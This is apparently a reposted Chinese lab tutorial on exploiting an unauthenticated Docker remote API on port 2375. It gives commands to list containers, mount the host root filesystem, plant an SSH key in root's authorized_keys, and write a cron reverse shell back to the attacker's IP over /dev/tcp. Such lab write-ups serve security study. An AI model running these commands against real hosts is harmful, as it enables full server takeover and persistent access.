Docker未授权访问漏洞

这篇具有很好参考价值的文章主要介绍了Docker未授权访问漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞产生原因 (www.hetianlab.com)

如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制访问来源的话,攻击者就可以通过Docker未授权来控制服务器。  

漏洞影响

攻击者利用 dockerclient 或者 http 直接请求就可以访问这个API,可能导致敏感信息泄露,也可以删除Docker上的数据。攻击者可进一步利用Docker自身特性,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。  

实验环境

目标机器: CentOS7+Docker、IP:10.1.1.200  
  
攻击机器:Kali+Docker、IP:10.1.1.100  
  

信息收集

nmap信息收集

发现开放:
22:ssh默认端口
2375:docker远程操控

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

利用2375端口

通过浏览器进行访问,如果页面显示message ”page not found" 代表存在漏洞,如果页面显示空白,可以通过info获取docker信息

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全
docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

获取image列表

10.1.1.200:2375/images/json

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

docker未授权访问漏洞利用

docker远程连接目标机器

通过docker client使用 -H 参数连接目标的docker,并使用ps-a命令查寻目标系统运行的所有容器

docker -H tcp://10.1.1.200 ps -a #列出所有容器

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

docker -H tcp://10.1.1.200 images #列出所有镜像

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

进入容器方法一

docker client连接目标,ps -a 查看哪些容器已经停止:

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

通过strat命令启动一个停止的容器:

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

attach 命令连接一个已经启动的容器:

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

这样就能够获得一个docker容器的shell

进入容器方法二

新运行一个容器并将entrypoint设置为/bin/bash或者/bin/sh,挂载点设置为服务器的根目录挂载至/mnt目录下(需要root权限启动docker)

docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba(镜像id)

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

docker未授权写ssh公钥获得shell

启动一个容器,挂载宿主机的/mnt目录(上一步骤已挂载),之后将攻击者的ssh公钥~/.ssh/id_rsa.pub的内容写到入宿主机的/root/.ssh/authorized_keys文件中,之后就可以用root账户直接登录了

首先kali生成id_rsa公钥:ssh-keygen -t rsa

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

生成的公钥在/root/.ssh/ 目录下:

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

将生成公钥写入到目标/root/.ssh/authorized_keys文件中:

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

>这个代表的意思为覆盖,>>代表为追加

此处的路径为之前所挂载的路径,如果挂载root路径那就为/root/root/.ssh

通过ssh进行连接,获取宿主机的shell

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

docker未授权写定时任务获得shell

启动一个容器,挂载宿主机的目录(此前已挂载),之后将反弹shell的脚本写入到/etc/crontab中,攻击机nc -lvvp port会得到一个反弹的shell。

将反弹shell的脚本写入到/var/spool/cron/root(centos系统)或/var/spool/cron/crontabs/root(ubuntu系统)

kali开启监听:

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

写入反弹shell的脚本

****为定时任务,此处为每分钟执行一次 /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全

docker未授权访问漏洞,漏洞复现,docker,容器,运维,web安全,安全文章来源地址https://www.toymoban.com/news/detail-667180.html

到了这里,关于Docker未授权访问漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Docker未授权访问漏洞(www.hetianlab.com)

    Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。 产生原因 如果在docker上配置了远程访问,d

    2024年02月04日
    浏览(57)
  • springboot未授权漏洞(漏洞复现Springboot未授权访问及修复)

    Actuator 的核心是端点 Endpoint,它用来监视应用程序及交互,spring-boot-actuator 中已经内置了非常多的Endpoint(health、info、beans、metrics、httptrace、shutdown等等),同时也允许我们自己扩展自己的Endpoints。每个 Endpoint 都可以启用和禁用。要远程访问 Endpoint,还必须通过 JMX 或 HTTP 进

    2024年02月05日
    浏览(52)
  • 漏洞复现 - - - Springboot未授权访问

    目录 一, 未授权访问是什么? 二,Actuator介绍 三,怎么进行漏洞发现呢? 四,实验环境 五,漏洞复现 1.通过访问env获取全部环境属性 2.通过/trace提供基本的http请求跟踪信息 3.利用反序列化进行getshell  1.启动脚本 2.开启监听  3.使用bp抓取一个/env的包 4.修改POST数据 未授权

    2024年01月20日
    浏览(45)
  • Druid未授权访问 漏洞复现

    Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池。Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。当开发者配置不当时就可能造成未授权访问漏洞。 1、通过目录扫描或手工输入路径http://www.xxxx.com/druid/index.html,发现存在Druid 未授权访

    2024年02月11日
    浏览(45)
  • 【Elasticsearch 未授权访问漏洞复现】

    ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完。由于Elasticsearch授权

    2024年02月05日
    浏览(58)
  • web渗透测试漏洞复现:Elasticsearch未授权漏洞复现

    Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能

    2024年04月10日
    浏览(48)
  • Redis未授权访问漏洞搭建复现

    今天我们来学习一下什么是Redis未授权访问漏洞,以及各种利用方法。 文章目录 一、 什么是Redis未授权访问漏洞 二、 Redis环境搭建 三、漏洞利用 四、漏洞总结 五、漏洞防护          Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访

    2024年02月06日
    浏览(47)
  • 漏洞复现 || Hadoop未授权访问反弹Shell漏洞

    技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或

    2024年02月16日
    浏览(45)
  • Springboot Actuator未授权访问漏洞复现

    更新时间:2022.07.20 Spring Boot Actuator 模块提供了生产级别的功能,比如健康检查,审计,指标收集,HTTP 跟踪等,帮助监控和管理Spring Boot 应用。这个模块是一个采集应用内部信息暴露给外部的模块,上述的功能都可以通过HTTP 和 JMX 访问。(来源:https://mp.weixin.qq.com/s/qY-hBSa

    2023年04月16日
    浏览(40)
  • Hadoop未授权访问 getshell——漏洞复现

     Hadoop未授权访问漏洞介绍 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害

    2024年04月16日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包